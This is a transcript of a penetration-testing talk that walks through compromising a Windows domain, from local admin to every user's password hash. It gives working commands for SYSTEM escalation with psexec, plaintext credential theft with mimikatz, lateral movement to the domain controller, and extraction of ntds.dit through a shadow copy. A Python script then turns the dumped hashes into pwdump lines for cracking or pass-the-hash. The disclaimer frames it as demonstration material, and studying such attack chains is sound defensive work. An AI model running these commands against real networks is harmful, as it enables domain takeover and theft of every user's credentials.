fall of a domain | from local admin to domain user hashes
Author: Riyaz Walikar
TRANSCRIPT
LOCAL ADMIN TO DOMAIN USER HASHES
The Fall of a Domain
Riyaz Walikar
Disclaimer
It was far more painstaking and complicated than this!
Demo setup to show execution path
All the commands were actually used in the pentest
Please do not try this on your office/corporate environment without written permission
Please exercise caution!
The story so far
Remote RDP access to a machine on the client network via VPN
Local Administrator rights to simulate an employee
The user is a limited domain user
Domain controller on the same network, reachable, with LDAP services running
Visually. This. [slide shows a diagram of the setup above]
Local Admin eh?
Locally logged in as TARDIS\fwhite
Limited domain user, but local admin
Other users connected? [Task Manager > Users]
Found another user connected to our system via RDP. Sweet! (possibly a domain admin)
Need SYSTEM privileges! Any ideas?
Think Sysinternals!
psexec -s -i cmd.exe (-s runs cmd.exe as the SYSTEM account, -i makes it interactive on the current desktop)
Dump connected user credentials
mimikatz – Benjamin Delpy
Extracts plaintext passwords from memory
Wdigest, tspkg, kerberos and many more
mimikatz privilege::debug token::elevate sekurlsa::logonPasswords
Windows (In)Security?
Now what?
http://gapingvoid.com/2008/06/13/now-what/
Remote CMD anyone?
RDP directly!
Let's be discreet
psexec -s -u TARDIS\atomboy \\10.10.10.1 cmd.exe (without -p, psexec prompts for the password)
Game already over!
Instead: RDP in with the recovered user credentials and present the report
Let's grab some hashes
Active Directory stores user information in %systemroot%\ntds\ntds.dit
Locked while the DC is running (LSASS holds it open), so it cannot simply be copied
ntdsutil snapshot = backup (Windows Server 2008 and later)
vssadmin create shadow /for=C: (Windows Server 2003 and later)
Let's grab some hashes
The backup is readable by NT AUTHORITY\SYSTEM and Administrators
We need ntds.dit and the SYSTEM registry hive (%systemroot%\System32\config\SYSTEM), which holds the boot key needed to decrypt the hashes
cd, dir and other built-in cmd commands do not work on an unmounted volume shadow copy: it is exposed only as a device path such as \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
copy works! Copy both files out by their full path on the shadow copy
Core files needed
Parsing the ntds.dit structure
NTDSXtract - A framework for offline forensic analysis of ntds.dit
Needs the libesedb module as well (ntds.dit is an ESE database)
libesedb and creddump come in ntds_dump_hash.zip
wget both to a Linux box (Kali is a good choice)
get framework + compile + make + run
wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
wget http://ntdsxtract.com/downloads/ntds_dump_hash.zip
unzip both
get framework + compile + make + run
cd ntds_dump_hash/libesedb
./configure && make
cd esedbtools
./esedbexport -l /tmp/ntds.log <ntds.dit>
(exports every table into a ntds.dit.export directory; the ones we need are datatable and link_table)
Yay!
python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> --passwordhistory <system_file>
(adjust the relative paths to wherever you unzipped ntdsxtract and exported the tables)
Clean up the output with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/master/ntdstopwdump.py)
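The clean-up step above, as an added example rather than the ntdstopwdump.py script itself or any NTDSXtract code: it parses the text dsusers.py prints, pulls the RID from each account's SID, and emits pwdump-format lines (user:RID:LM:NT:::), the input most crackers and pass-the-hash tools expect, filling in the well-known empty-LM and blank-NT placeholders where a hash is absent. The input layout and the constructed sample records (two TARDIS accounts with made-up hashes) are assumptions; parse_dsusers, to_pwdump and pwdump_line are names chosen here.

```python
"""Turn NTDSXtract dsusers.py text output into pwdump-style lines.

Added example, not NTDSXtract's or ntdstopwdump.py's own code. The input
layout is an assumption about dsusers.py --passwordhashes/--passwordhistory
output: one block per object starting at "Record ID:", with "SAM Account
name:" and "SID:" fields, then indented "<name>:[$NT$]<32 hex>:::" lines
under "Password hashes:" and "Password history:". Lines carrying the $NT$
prefix are treated as NT hashes, bare 32-hex lines as LM hashes.
"""
import re
import sys

# pwdump placeholders: no LM hash stored / blank NT password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

HASH_LINE = re.compile(r"^(?P<name>[^:]+):(?P<nt>\$NT\$)?(?P<hash>[0-9a-fA-F]{32}):::$")
HISTORY_NAME = re.compile(r"_(?:nt|lm)history(\d+)$")

# Constructed sample in the assumed dsusers.py layout; hash values are made up
SAMPLE = """Record ID:           3740
User name:           Administrator
User principal name:
SAM Account name:    Administrator
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
SID:                 S-1-5-21-1004336348-1177238915-682003330-500
Password hashes:
\tAdministrator:$NT$8846f7eaee8fb117ad06bdd830b7586c:::
Password history:
\tAdministrator_nthistory0:$NT$e19ccf75ee54e06b06a5907af13cef42:::
Record ID:           3812
User name:           fwhite
User principal name:
SAM Account name:    fwhite
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
SID:                 S-1-5-21-1004336348-1177238915-682003330-1108
Password hashes:
\tfwhite:e52cac67419a9a224a3b108f3fa6cb6d:::
\tfwhite:$NT$a4f49c406510bdcab6824ee7c30fd852:::
"""


def parse_dsusers(text):
    """Return one dict per record: sam, rid, lm, nt and history {name: {lm, nt}}."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("Record ID:"):
            cur = {"sam": None, "rid": None, "lm": None, "nt": None, "history": {}}
            records.append(cur)
            section = None
        elif cur is None:
            continue
        elif line.startswith("SAM Account name:"):
            cur["sam"] = line.split(":", 1)[1].strip()
        elif line.startswith("SID:"):
            # The RID is the last sub-authority of the SID (500 = built-in Administrator)
            sid = line.split(":", 1)[1].strip()
            if sid.startswith("S-"):
                cur["rid"] = int(sid.rsplit("-", 1)[1])
        elif line.startswith("Password hashes:"):
            section = "hashes"
        elif line.startswith("Password history:"):
            section = "history"
        elif section and line[:1] in (" ", "\t"):
            m = HASH_LINE.match(line.strip())
            if not m:
                continue
            kind = "nt" if m.group("nt") else "lm"
            value = m.group("hash").lower()
            if section == "hashes":
                cur[kind] = value
            else:
                # fold <sam>_nthistoryN and <sam>_lmhistoryN into one entry per N
                key = HISTORY_NAME.sub(r"_history\1", m.group("name"))
                cur["history"].setdefault(key, {})[kind] = value
        else:
            section = None  # any other field ends the hash block
    return records


def pwdump_line(name, rid, lm, nt):
    """One pwdump record, substituting the empty-hash constants where needed."""
    return f"{name}:{rid}:{lm or EMPTY_LM}:{nt or EMPTY_NT}:::"


def to_pwdump(records, history=False):
    """pwdump lines for every account that has a hash; optionally its history too."""
    out = []
    for r in records:
        if r["sam"] is None or r["rid"] is None:
            continue
        if r["lm"] or r["nt"]:
            out.append(pwdump_line(r["sam"], r["rid"], r["lm"], r["nt"]))
        if history:
            for name, h in sorted(r["history"].items()):
                out.append(pwdump_line(name, r["rid"], h.get("lm"), h.get("nt")))
    return out


if __name__ == "__main__":
    args = [a for a in sys.argv[1:] if a != "--history"]
    text = open(args[0]).read() if args else SAMPLE
    print("\n".join(to_pwdump(parse_dsusers(text), history="--history" in sys.argv)))
```

Redirect dsusers.py's output to a file and pass it as the first argument; add --history to also emit the previous passwords as separate <sam>_historyN lines, which often crack faster than the current ones and reveal the user's password pattern.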
Now what?
http://gapingvoid.com/2008/06/13/now-what/
Pass the hash / Password Cracking!
Use the Windows Credentials Editor – Amplia Security
Password Cracking >> Humla perhaps
References
http://blog.gentilkiwi.com/mimikatz
http://www.ampliasecurity.com/research/wcefaq.html
http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_16.html
Thank you
[email protected]
http://www.riyazwalikar.com